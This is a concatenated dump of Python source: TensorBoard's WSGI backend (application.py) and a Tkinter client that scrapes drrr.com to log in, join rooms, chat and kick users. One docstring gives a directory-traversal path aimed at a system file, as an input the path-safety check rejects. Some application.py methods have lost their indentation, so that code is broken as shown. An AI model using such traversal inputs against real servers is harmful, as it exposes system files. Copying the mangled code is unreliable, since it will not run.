    # wait for all process
    for p in processes:
        p.join()
# Script entry point: run decoding only when executed directly.
if __name__ == "__main__":
    main()
|
application.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
from tensorflow.tensorboard.plugins.text import text_plugin
# Per-category caps on how many events the multiplexer keeps in memory
# (reservoir sampling limits passed to EventMultiplexer).
DEFAULT_SIZE_GUIDANCE = {
    event_accumulator.COMPRESSED_HISTOGRAMS: 500,
    event_accumulator.IMAGES: 10,
    event_accumulator.AUDIO: 10,
    event_accumulator.SCALARS: 1000,
    event_accumulator.HEALTH_PILLS: 100,
    event_accumulator.HISTOGRAMS: 50,
}
# URL routes for the data-serving endpoints registered in
# TensorBoardWSGIApp.data_applications.
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
# Map from the format name imghdr detects to the MIME type served for it;
# anything unrecognized falls back to a generic binary type.
_IMGHDR_TO_MIMETYPE = {
    'bmp': 'image/bmp',
    'gif': 'image/gif',
    'jpeg': 'image/jpeg',
    'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
  """Sniff a MIME type from raw image bytes, defaulting to octet-stream."""
  # NOTE(review): imghdr was removed from the stdlib in Python 3.13;
  # fine for this Python-2-era codebase, but a porting hazard.
  image_type = imghdr.what(None, encoded_image_string)
  return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
  """An enum used to list the valid output formats for API calls.

  Not all API calls support all formats (for example, only scalars and
  compressed histograms support CSV).
  """
  # Values match the `format` query-string parameter sent by clients.
  JSON = 'json'
  CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
  """Construct a TensorBoardWSGIApp with standard plugins and multiplexer.

  Args:
    logdir: The logdir spec describing where event data is loaded from.
    purge_orphaned_data: Whether the multiplexer discards orphaned data.
    reload_interval: How often (in seconds) to reload the multiplexer;
      falsy means a single synchronous load (see TensorBoardWSGIApp).

  Returns:
    A TensorBoardWSGIApp wired with the debugger, projector and text
    plugins.
  """
  multiplexer = event_multiplexer.EventMultiplexer(
      size_guidance=DEFAULT_SIZE_GUIDANCE,
      purge_orphaned_data=purge_orphaned_data)
  # Plugins are keyed by their route prefix (served under /data/plugin/<name>).
  plugins = {
      debugger_plugin.PLUGIN_PREFIX_ROUTE: debugger_plugin.DebuggerPlugin(),
      projector_plugin.PLUGIN_PREFIX_ROUTE: projector_plugin.ProjectorPlugin(),
      text_plugin.PLUGIN_PREFIX_ROUTE: text_plugin.TextPlugin(),
  }
  return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
  def __init__(self, logdir, plugins, multiplexer, reload_interval):
    """Constructs the TensorBoard application.

    Args:
      logdir: the logdir spec that describes where data will be loaded.
        may be a directory, or comma,separated list of directories, or colons
        can be used to provide named directories
      plugins: Map from plugin name to plugin application
      multiplexer: The EventMultiplexer with TensorBoard data to serve
      reload_interval: How often (in seconds) to reload the Multiplexer.
        Falsy values trigger one synchronous load instead of a reload loop.

    Returns:
      A WSGI application that implements the TensorBoard backend.
    """
    self._logdir = logdir
    self._plugins = plugins
    self._multiplexer = multiplexer
    self.tag = get_tensorboard_tag()
    path_to_run = parse_event_files_spec(self._logdir)
    if reload_interval:
      # Background reload loop; returns immediately.
      start_reloading_multiplexer(self._multiplexer, path_to_run,
                                  reload_interval)
    else:
      # One blocking load at startup.
      reload_multiplexer(self._multiplexer, path_to_run)
    # Route table mapping URL paths to the handler methods below.
    self.data_applications = {
        DATA_PREFIX + LOGDIR_ROUTE:
            self._serve_logdir,
        DATA_PREFIX + SCALARS_ROUTE:
            self._serve_scalars,
        DATA_PREFIX + GRAPH_ROUTE:
            self._serve_graph,
        DATA_PREFIX + RUN_METADATA_ROUTE:
            self._serve_run_metadata,
        DATA_PREFIX + HISTOGRAMS_ROUTE:
            self._serve_histograms,
        DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
            self._serve_compressed_histograms,
        DATA_PREFIX + IMAGES_ROUTE:
            self._serve_images,
        DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
            self._serve_image,
        DATA_PREFIX + AUDIO_ROUTE:
            self._serve_audio,
        DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
            self._serve_individual_audio,
        DATA_PREFIX + RUNS_ROUTE:
            self._serve_runs,
        '/app.js':
            self._serve_js
    }
    # Serve the routes from the registered plugins using their name as the route
    # prefix. For example if plugin z has two routes /a and /b, they will be
    # served as /data/plugin/z/a and /data/plugin/z/b.
    for name in self._plugins:
      try:
        plugin = self._plugins[name]
        plugin_apps = plugin.get_plugin_apps(self._multiplexer, self._logdir)
      except Exception as e:  # pylint: disable=broad-except
        # A failing plugin must not take down the whole application.
        logging.warning('Plugin %s failed. Exception: %s', name, str(e))
        continue
      for route, app in plugin_apps.items():
        path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
        self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
  @wrappers.Request.application
  def _serve_logdir(self, request):
    """Respond with a JSON object containing this TensorBoard's logdir."""
    # Lets the frontend display which logdir spec this instance serves.
    return http_util.Respond(
        request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
writer.writerow(['Wall time', 'Step', 'Value'])
writer.writerows(values)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
  @wrappers.Request.application
  def _serve_histograms(self, request):
    """Given a tag and single run, return an array of histogram values."""
    # JSON only; CSV export exists solely for scalars and compressed
    # histograms (see _OutputFormat).
    tag = request.args.get('tag')
    run = request.args.get('run')
    values = self._multiplexer.Histograms(run, tag)
    return http_util.Respond(request, values, 'application/json')
  @wrappers.Request.application
  def _serve_compressed_histograms(self, request):
    """Given a tag and single run, return an array of compressed histograms."""
    tag = request.args.get('tag')
    run = request.args.get('run')
    compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
    if request.args.get('format') == _OutputFormat.CSV:
      string_io = StringIO()
      writer = csv.writer(string_io)
      # Build the headers; we have two columns for timing and two columns for
      # each compressed histogram bucket.
      headers = ['Wall time', 'Step']
      if compressed_histograms:
        # All events of a series share a bucket count, so the first event
        # determines how many column pairs the header needs.
        bucket_count = len(compressed_histograms[0].compressed_histogram_values)
        for i in xrange(bucket_count):
          headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
      writer.writerow(headers)
      for compressed_histogram in compressed_histograms:
        row = [compressed_histogram.wall_time, compressed_histogram.step]
        for value in compressed_histogram.compressed_histogram_values:
          row += [value.rank_in_bps, value.value]
        writer.writerow(row)
      return http_util.Respond(request, string_io.getvalue(), 'text/csv')
    else:
      return http_util.Respond(
          request, compressed_histograms, 'application/json')
  @wrappers.Request.application
  def _serve_images(self, request):
    """Given a tag and list of runs, serve a list of images.

    Note that the images themselves are not sent; instead, we respond with URLs
    to the images. The frontend should treat these URLs as opaque and should not
    try to parse information about them or generate them itself, as the format
    may change.

    Args:
      request: A werkzeug.wrappers.Request object.

    Returns:
      A werkzeug.Response application.
    """
    tag = request.args.get('tag')
    run = request.args.get('run')
    images = self._multiplexer.Images(run, tag)
    # Delegate metadata/URL construction so it stays in sync with
    # _serve_image and _query_for_individual_image.
    response = self._image_response_for_run(images, run, tag)
    return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
    """Respond with JSON metadata for the audio clips of one run/tag.

    The clips themselves are not sent; the response carries opaque URLs
    that the frontend must not parse or construct itself, as their format
    may change.

    Args:
      request: A werkzeug.wrappers.Request object.

    Returns:
      A werkzeug.Response application.
    """
    run_name = request.args.get('run')
    tag_name = request.args.get('tag')
    clips = self._multiplexer.Audio(run_name, tag_name)
    payload = self._audio_response_for_run(clips, run_name, tag_name)
    return http_util.Respond(request, payload, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
    """Serve the raw bytes of a single sampled audio clip.

    Query args: 'run', 'tag', and integer 'index' into the sampled clips.
    """
    run_name = request.args.get('run')
    tag_name = request.args.get('tag')
    idx = int(request.args.get('index'))
    clip = self._multiplexer.Audio(run_name, tag_name)[idx]
    return http_util.Respond(request, clip.encoded_audio_string, clip.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
    """WSGI app serving a JSON object about runs and tags.

    Returns a mapping from runs to tagType to list of tags for that run,
    with each run additionally annotated with 'firstEventTimestamp'
    (None when it cannot be determined).

    Args:
      request: A werkzeug request

    Returns:
      A werkzeug Response with the following content:
      {runName: {images: [tag1, tag2, tag3],
                 audio: [tag4, tag5, tag6],
                 scalars: [tagA, tagB, tagC],
                 histograms: [tagX, tagY, tagZ],
                 firstEventTimestamp: 123456.789}}
    """
    runs = self._multiplexer.Runs()
    for run_name, run_data in runs.items():
        try:
            timestamp = self._multiplexer.FirstEventTimestamp(run_name)
        except ValueError:
            # A run with no events has no timestamp; report None instead.
            logging.warning('Unable to get first event timestamp for run %s',
                            run_name)
            timestamp = None
        run_data['firstEventTimestamp'] = timestamp
    return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
    """Serves the index page (i.e., the tensorboard app itself)."""
    index_path = '/dist/index.html'
    return self._serve_static_file(request, index_path)
@wrappers.Request.application
def _serve_js(self, request):
    """Serves the JavaScript bundle for the index page."""
    js_path = '/dist/app.js'
    return self._serve_static_file(request, js_path)
def _serve_static_file(self, request, path):
    """Serves the static file located at the given path.

    Args:
      request: A werkzeug Request
      path: The path of the static file, relative to the tensorboard/ directory.

    Returns:
      A werkzeug.Response application. 400 for unsafe paths, 404 when the
      resource cannot be found under either lookup scheme.
    """
    # Strip off the leading forward slash.
    orig_path = path.lstrip('/')
    # Reject traversal or otherwise unsafe paths outright.
    if not self._path_is_safe(orig_path):
        logging.warning('path not safe: %s', orig_path)
        return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
    # Resource loader wants a path relative to //WORKSPACE/tensorflow.
    path = os.path.join('tensorboard', orig_path)
    # Open the file and read it.
    try:
        contents = resource_loader.load_resource(path)
    except IOError:
        # For compatibility with latest version of Bazel, we renamed bower
        # packages to use '_' rather than '-' in their package name.
        # This means that the directory structure is changed too.
        # So that all our recursive imports work, we need to modify incoming
        # requests to map onto the new directory structure.
        path = orig_path
        components = path.split('/')
        components[0] = components[0].replace('-', '_')
        path = ('/').join(components)
        # Bazel keeps all the external dependencies in //WORKSPACE/external.
        # and resource loader wants a path relative to //WORKSPACE/tensorflow/.
        path = os.path.join('../external', path)
        try:
            contents = resource_loader.load_resource(path)
        except IOError:
            # Neither the direct path nor the external fallback worked.
            logging.warning('path %s not found, sending 404', path)
            return http_util.Respond(request, 'Not found', 'text/plain', code=404)
    # Guess the MIME type from the (possibly rewritten) path; fall back to
    # a generic binary type when unknown.
    mimetype, content_encoding = mimetypes.guess_type(path)
    mimetype = mimetype or 'application/octet-stream'
    return http_util.Respond(
        request,
        contents,
        mimetype,
        expires=3600,
        content_encoding=content_encoding)
def __call__(self, environ, start_response):  # pylint: disable=invalid-name
    """Central entry point for the TensorBoard application.

    This method handles routing to sub-applications. It does simple routing
    using regular expression matching.

    This __call__ method conforms to the WSGI spec, so that instances of this
    class are WSGI applications.

    Args:
      environ: See WSGI spec.
      start_response: See WSGI spec.

    Returns:
      A werkzeug Response.
    """
    request = wrappers.Request(environ)
    parsed_url = urlparse.urlparse(request.path)
    # Remove a trailing slash, if present.
    clean_path = parsed_url.path
    if clean_path.endswith('/'):
        clean_path = clean_path[:-1]
    # Routing precedence: data endpoints first, then known tab routes
    # (which all serve the single-page app index), then static files.
    # pylint: disable=too-many-function-args
    if clean_path in self.data_applications:
        return self.data_applications[clean_path](environ, start_response)
    elif clean_path in TAB_ROUTES:
        return self._serve_index(environ, start_response)
    else:
        return self._serve_static_file(request, clean_path)(environ,
                                                            start_response)
    # pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
    """Parses `logdir` into a map from paths to run group names.

    The events files flag format is a comma-separated list of path
    specifications. A path specification either looks like
    'group_name:/path/to/directory' or '/path/to/directory'; in the latter
    case, the group is unnamed. Group names cannot start with a forward
    slash: /foo:bar/baz will be interpreted as a spec with no name and
    path '/foo:bar/baz'. Globs are not supported.

    Args:
      logdir: A comma-separated list of run specifications.

    Returns:
      A dict mapping directory paths to names like
      {'/path/to/directory': 'name'}. Groups without an explicit name are
      named after their path (value None). If logdir is None, returns an
      empty dict, which is helpful for testing things that don't require
      any valid runs.
    """
    path_to_name = {}
    if logdir is None:
        return path_to_name
    # Make sure keeping consistent with ParseURI in core/lib/io/path.cc
    uri_re = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
    for spec in logdir.split(','):
        # A spec starting with xyz:// is a URI path spec, not a group spec,
        # and /foo:bar/baz is assumed to be a plain path containing a colon.
        has_group = (uri_re.match(spec) is None
                     and ':' in spec
                     and not spec.startswith('/'))
        if has_group:
            # Split at most once so run_name:/path:with/a/colon still works.
            name, _, path = spec.partition(':')
        else:
            name = None
            path = spec
        # Canonicalize filesystem paths; leave URIs untouched.
        if uri_re.match(path) is None:
            path = os.path.realpath(path)
        path_to_name[path] = name
    return path_to_name
def reload_multiplexer(multiplexer, path_to_run):
    """Loads all runs into the multiplexer.

    Args:
      multiplexer: The `EventMultiplexer` to add runs to and reload.
      path_to_run: A dict mapping from paths to run names, where `None` as
        the run name is interpreted as a run name equal to the path.
    """
    start = time.time()
    logging.info('TensorBoard reload process beginning')
    for (path, name) in six.iteritems(path_to_run):
        multiplexer.AddRunsFromDirectory(path, name)
    logging.info('TensorBoard reload process: Reload the whole Multiplexer')
    multiplexer.Reload()
    elapsed = time.time() - start
    logging.info('TensorBoard done reloading. Load took %0.3f secs', elapsed)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
    """Starts a thread to automatically reload the given multiplexer.

    The thread reloads the multiplexer by calling `reload_multiplexer`
    every `load_interval` seconds, starting immediately.

    Args:
      multiplexer: The `EventMultiplexer` to add runs to and reload.
      path_to_run: A dict mapping from paths to run names, where `None` as
        the run name is interpreted as a run name equal to the path.
      load_interval: How many seconds to wait after one load before
        starting the next load.

    Returns:
      A started `threading.Thread` that reloads the multiplexer.
    """
    # We don't call multiplexer.Reload() here because that would make
    # AddRunsFromDirectory block until the runs have all loaded.
    def _reload_loop():
        while True:
            reload_multiplexer(multiplexer, path_to_run)
            time.sleep(load_interval)

    thread = threading.Thread(target=_reload_loop)
    thread.daemon = True
    thread.start()
    return thread
def get_tensorboard_tag():
    """Read the TensorBoard TAG number, and return it or an empty string."""
    return resource_loader.load_resource('tensorboard/TAG').strip()
|
main_part.py | # -- coding: utf-8 --
import requests
import time
import re
import json
import copy
import threading
import tkinter
import tkinter.messagebox
# Browser-impersonating headers used for the login / plain HTML pages.
login_header = {
    'Host': 'drrr.com',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
}
# Headers for the AJAX (XHR) endpoints; 'referer' is filled in per room
# before posting, and several functions mutate this dict in place.
session_headers = {
    'authority': 'drrr.com',
    'method': 'POST',
    'path': '/room/?ajax=1',
    'scheme': 'https',
    'accept': '*/*',
    'accept-encoding': 'gzip, deflate, br',
    'accept-language': 'zh-CN,zh;q=0.9',
    'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'origin': 'https://drrr.com',
    'referer': None,
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
    'x-requested-with': 'XMLHttpRequest',
}
# drrr.com endpoints used throughout this module.
login_url = 'https://drrr.com/'
post_message_url = 'https://drrr.com/room/?ajax=1'
get_message_url = 'https://drrr.com/json.php?fast=1'
update_message_url = 'https://drrr.com/json.php?update=%s'
create_url = 'https://drrr.com/create_room/?'
# One shared Session keeps the drrr.com login cookies across all requests.
session = requests.Session()
# Log in to drrr.com, then enter (or create) the requested room.
def login(user_name, room_name, roomInfos):
    """Log in with *user_name* and enter the room named *room_name*.

    If no room in *roomInfos* matches, a new room is created instead.
    Returns (room_name, room_id, session).
    """
    nickname = user_name  # input("输入昵称: ")
    # Warm-up request, then fetch the login form to scrape the CSRF token.
    session.get(login_url, headers=login_header)
    response = session.get(login_url, headers=login_header, allow_redirects=False)
    token = re.search('name="token" data-value="(.*?)"', response.text).group(1)
    data = {
        'name': '%s' % nickname,
        'login': 'ENTER',
        'token': token,
        'direct-join': '',
        'language': 'zh-CN',
        'icon': 'zaika-2x',
    }
    session.post(login_url, headers=login_header, data=data)
    # Look the room up by name in the caller-provided listing.
    room_id = None
    for room in roomInfos:
        if room['name'] == room_name:
            room_id = room['roomId']
    if not room_id:
        room_id = create_room(room_name)
    else:
        room_name, room_id = join(room_id)
    return room_name, room_id, session
# Lobby: look a room id up by its display name.
def lounge(name):
    """Return the roomId of the lounge room called *name*, or None."""
    lounge_url = 'https://drrr.com/lounge/'
    login_header.update({'Referer': 'https://drrr.com/'})
    session.get(lounge_url, headers=login_header)
    login_header.update({'Referer': 'https://drrr.com/lounge/'})
    listing = session.get('https://drrr.com/lounge?api=json', headers=login_header)
    try:
        for room in json.loads(listing.text)['rooms']:
            if room['name'] == name:
                return room['roomId']
    except Exception as e:
        # Best effort: a malformed listing just logs and returns None.
        print(str(e))
# Create a new room on drrr.com and open it.
def create_room(name, description='', limit=10, language='zh-CN', music='true'):
    """Create a room named *name* and navigate into it; returns True."""
    form = {
        'name': name,
        'description': description,
        'limit': limit,
        'language': language,
        'submit': '创建房间'
    }
    if music == 1 or music == 'true':
        music = 'true'
        form.update({'music': music})
    create_headers = copy.deepcopy(session_headers)
    create_headers.update({'referer': 'https://drrr.com/create_room/?',
                           'path': '/create_room/?',
                           'cache - control': 'max - age = 0',
                           'accept-encoding': None})
    session.post(url=create_url, data=form, headers=create_headers)
    # Follow up with a plain GET so the session ends up inside the room.
    room_url = 'https://drrr.com/room/'
    join_headers = {
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Referer': 'https://drrr.com/lounge',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    session.get(room_url, headers=join_headers)
    return True
# Join an existing room by its id.
def join(room_id):
    """Enter room *room_id*; returns (room_name, room_id) on success,
    or (None, None) when the nickname is already taken in that room."""
    join_headers = {
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Referer': 'https://drrr.com/lounge',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    response = session.get(url='https://drrr.com/room/?id=%s' % room_id,
                           headers=join_headers, allow_redirects=True)
    if 'zh-CN' not in response.text:
        # Same nickname already present: warn, reset cookies, and bail out.
        tkinter.messagebox.showerror(title="warning", message='已有相同用户名存在,请使用其他名称')
        session.cookies = requests.utils.cookiejar_from_dict({'cookies': None}, cookiejar=None, overwrite=True)
        return None, None
    # Scrape the canonical room name and id out of the room page.
    room_name = re.search('data-title="I\'m in “(.*?)”', response.text).group(1)
    room_id = re.search('data-url=".*id=(.*?)"', response.text).group(1)
    return room_name, room_id
# Send a chat message (or a slash command) to the current room.
def post_message(room_id, message, Entry, root, event=None):
    """Post *message* to the room, handling the client-side slash commands.

    Supported commands: '/leave' (exit room and close window), '/to <name>
    <msg>' (private message), '/host <name>', '/kick <name>', and
    '/music <name> <url>'. Retries the POST until the server answers
    200 or 500, then clears the input *Entry*.
    """
    session_headers.update({'referer': 'https://drrr.com/room/?id=%s' % room_id,
                            'method': 'POST'})
    if message == '/leave':
        leave()
        root.destroy()
    else:
        while True:
            global users
            mslist = message.split(" ")
            to = ''
            # '/to name text' — resolve the recipient's id from the member list.
            if '/to' in mslist[0]:
                message = mslist[2]
                to_name = mslist[1]
                for user in users:
                    if to_name == user['name']:
                        to = user['id']
            # Default payload: a (possibly private) chat message.
            data = {
                'message': message,
                'url': '',
                'to': to,
            }
            # Command payloads replace the default data dict entirely.
            if '/host' in mslist[0]:
                host_name = mslist[1]
                for user in users:
                    if host_name == user['name']:
                        data = {'new_host': user['id']}
            elif '/kick' in mslist[0]:
                try:
                    kick_name = mslist[1]
                    for user in users:
                        if kick_name == user['name']:
                            data = {'kick': user['id']}
                except: pass
            elif '/music' in mslist[0]:
                try:
                    music_name = mslist[1]
                    music_url = mslist[2]
                    data = {
                        'music': 'music',
                        'name': music_name,
                        'url': music_url
                    }
                except: pass
            response = session.post(url=post_message_url, headers=session_headers, data=data)
            # NOTE(review): 500 is treated as terminal like 200 — presumably to
            # avoid re-posting a request the server already rejected; confirm.
            if response.status_code == 200 or response.status_code == 500:
                break
        # Clear the input box; the widget may already be destroyed.
        try:
            Entry.delete(0, tkinter.END)
        except: pass
# Leave the current room.
def leave():
    """Post the special '/leave' message, retrying every second until the
    server acknowledges it with HTTP 200."""
    while True:
        payload = {
            'message': '/leave',
            'url': '',
            'to': '',
        }
        response = session.post(url=post_message_url, headers=session_headers, data=payload)
        if response.status_code == 200:
            break
        time.sleep(1)
first = 1  # 1 until the initial room snapshot is rendered; parse_message resets it to 0
# Parse a polling response and render it into the chat window.
def parse_message(messages, myname, Text, room_id, lb):
    """Render one polling response into the chat *Text* widget.

    Handles the message types seen in drrr responses: 'message', 'me',
    'roll', 'join', 'leave', 'new-host', 'music', and 'kick'. Updates the
    module globals *users* (member list) and *first* (initial-snapshot
    flag), and refreshes the member listbox *lb* when membership changes.
    """
    messages = json.loads(messages.text)
    # Tk font specs for highlighted names vs. normal message text.
    bold_font = "-family {Microsoft YaHei UI Light} -size 10 -weight " \
                "bold -slant roman -underline 0 -overstrike 0"
    font = "-family {Microsoft YaHei UI Light} -size 9 -weight " \
           "normal -slant roman -underline 0 -overstrike 0"
    global first, users
    host = messages.get('host')
    if messages.get('talks'):
        for message in messages['talks']:
            # Sender name lives under 'user' for room events, 'from' for
            # private messages (which also carry the sender id).
            try:
                name = message['user']['name']
            except:
                try:
                    name = message['from']['name']
                    id = message['from']['id']
                except: pass
            type = message['type']
            Text.configure(foreground='#ffffff')
            Text.configure(font=font)
            if type == 'message':
                if message.get('to'):
                    # Private message: blue bold name, popup for incoming ones.
                    Text.tag_config('private', font=bold_font, foreground='blue')
                    Text.insert(tkinter.END, name, 'private')
